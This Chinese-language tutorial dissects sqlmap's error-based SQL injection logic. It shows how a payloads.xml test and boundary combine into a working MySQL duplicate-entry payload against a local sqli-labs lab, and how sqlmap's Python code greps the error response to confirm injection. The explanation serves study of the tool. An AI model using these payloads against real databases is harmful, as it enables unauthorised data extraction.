目標網址
http://127.0.0.1/shentou/sqli-labs-master/Less-5/?id=1
Payload的生成
1 <test> 2 <title>MySQL >= 5.0 AND error-based - WHERE or HAVING clause</title> 3 <stype>2</stype> 4 <level>1</level> 5 <risk>0</risk> 6 <clause>1</clause> 7 <where>1</where> 8 <vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</vector> 9 <request> 10 <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload> 11 </request> 12 <response> 13 <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep> 14 </response> 15 <details> 16 <dbms>MySQL</dbms> 17 <dbms_version>>= 5.0</dbms_version> 18 </details> 19 </test>
該test xml元素是從文件payloads.xml提取出來的。
sqlmap會實現讀取payloads.xml文件中的test元素,然后循環遍歷,並生成相應的payload進行測試。
以上面的test為例,當遍歷到該test的時候,在其子循環當中,還需要依次遍歷boundary元素(都在payloads.xml文件中),並找到一個匹配的boundary。
何為匹配?
注意上面的test元素的子節點:where=1 和 clause=1
當且僅當某個boundary元素的where節點的值包含test元素的子節點,clause節點的值包含test元素的子節點的時候,該boundary才能和當前的test匹配,從而進一步生成payload。
例如:
1 <boundary> 2 <level>1</level> 3 <clause>1</clause> 4 <where>1,2</where> 5 <ptype>2</ptype> 6 <prefix>'</prefix> 7 <suffix>AND '[RANDSTR]'='[RANDSTR]</suffix> 8 </boundary>
該boundary元素中的where節點的值為1,2,含有test元素的where節點的值(1)
並且,boundary元素中的clause節點的值為1,含有test元素的where節點的值(1)
因此,該boundary和test元素可以匹配。
test元素的payload的值為:
AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
最終的payload是根據test的payload子節點和boundary的prefix(前綴)、suffix(后綴)子節點的值組合而成的,即:
最終的payload = url參數 + boundary.prefix+test.payload+boundary.suffix
將其中的[RANDNUM]、[DELIMITER_START]、[DELIMITER_STOP]替換掉之后
則生成的payload類似如下:
Payload: id=1' AND (SELECT 1497 FROM(SELECT COUNT(*),CONCAT(CHAR(58,101,121,111,58),(SELECT (CASE WHEN (1497=1497) THEN 1 ELSE 0 END)),CHAR(58,97,98,104,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'pujM'='pujM
其中:
- URL參數:id=1
- prefix:'
- payload:AND (SELECT 1497 FROM(SELECT COUNT(*),CONCAT(CHAR(58,101,121,111,58),(SELECT (CASE WHEN (1497=1497) THEN 1 ELSE 0 END)),CHAR(58,97,98,104,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
- suffix:AND 'pujM'='pujM
最終生成的mysql語句為:
SELECT * FROM users WHERE id = '1' AND ( SELECT 1497 FROM ( SELECT COUNT(*), CONCAT( CHAR (58, 101, 121, 111, 58), ( SELECT ( CASE WHEN (1497 = 1497) THEN 1 ELSE 0 END ) ), CHAR (58, 97, 98, 104, 58), FLOOR(RAND(0) * 2) ) x FROM information_schema. TABLES GROUP BY x ) a ) AND 'pujM' = 'pujM'
如果,url:http://127.0.0.1/shentou/sqli-labs-master/Less-5/?id=1可注入的話,那么執行的時候就會報如下錯誤:
Duplicate entry ':eyo:1:abh:1' for key 'group_key'
源碼解釋
1 # In case of error-based SQL injection 2 elif method == PAYLOAD.METHOD.GREP: 3 # Perform the test's request and grep the response 4 # body for the test's <grep> regular expression 5 try: 6 page, headers = Request.queryPage(reqPayload, place, content=True, raise404=False) 7 output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \ 8 or extractRegexResult(check, listToStrValue(headers.headers \ 9 if headers else None), re.DOTALL | re.IGNORECASE) \ 10 or extractRegexResult(check, threadData.lastRedirectMsg[1] \ 11 if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \ 12 threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE) 13 14 if output: 15 result = output == "1" 16 if result: 17 infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title) 18 logger.info(infoMsg) 19 20 injectable = True 21 22 except sqlmapConnectionException, msg: 23 debugMsg = "problem occured most likely because the " 24 debugMsg += "server hasn't recovered as expected from the " 25 debugMsg += "error-based payload used ('%s')" % msg 26 logger.debug(debugMsg)
將最終的payload傳遞給Request.queryPage函數執行並返回最終的執行結果page
test元素的grep子節點的值是一個正則表達式:<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
由前面的數據,我們知道
[DELIMITER_START]=:eyo:
[DELIMITER_STOP] =:abh:
則最終生成的正則表達式為::eyo:(?P<result>.*?):abh:(每次生成都是不一樣的,因為:eyo:和:abh:都是隨機生成的)
將page和正則表達式傳遞給函數extractRegexResult
1 def extractRegexResult(regex, content, flags=0): 2 """ 3 Returns 'result' group value from a possible match with regex on a given 4 content 5 """ 6 7 retVal = None 8 9 if regex and content and '?P<result>' in regex: 10 match = getCompiledRegex(regex, flags).search(content) 11 12 if match: 13 retVal = match.group("result") 14 15 return retVal
函數功能較簡單,主要使用正則表達式判斷是否包含指定的數據,如果有,則返回匹配的數據,沒有,則返回None。
由前面的內容,可知,如果url可以注入的話,返回值retVal應該等於"1"
if output: result = output == "1" if result: infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title) logger.info(infoMsg) injectable = True
而使用正則::eyo:(?P<result>.*?):abh:來匹配Duplicate entry ':eyo:1:abh:1' for key 'group_key'的結果為:1
故,url:http://127.0.0.1/shentou/sqli-labs-master/Less-5/?id=1可注入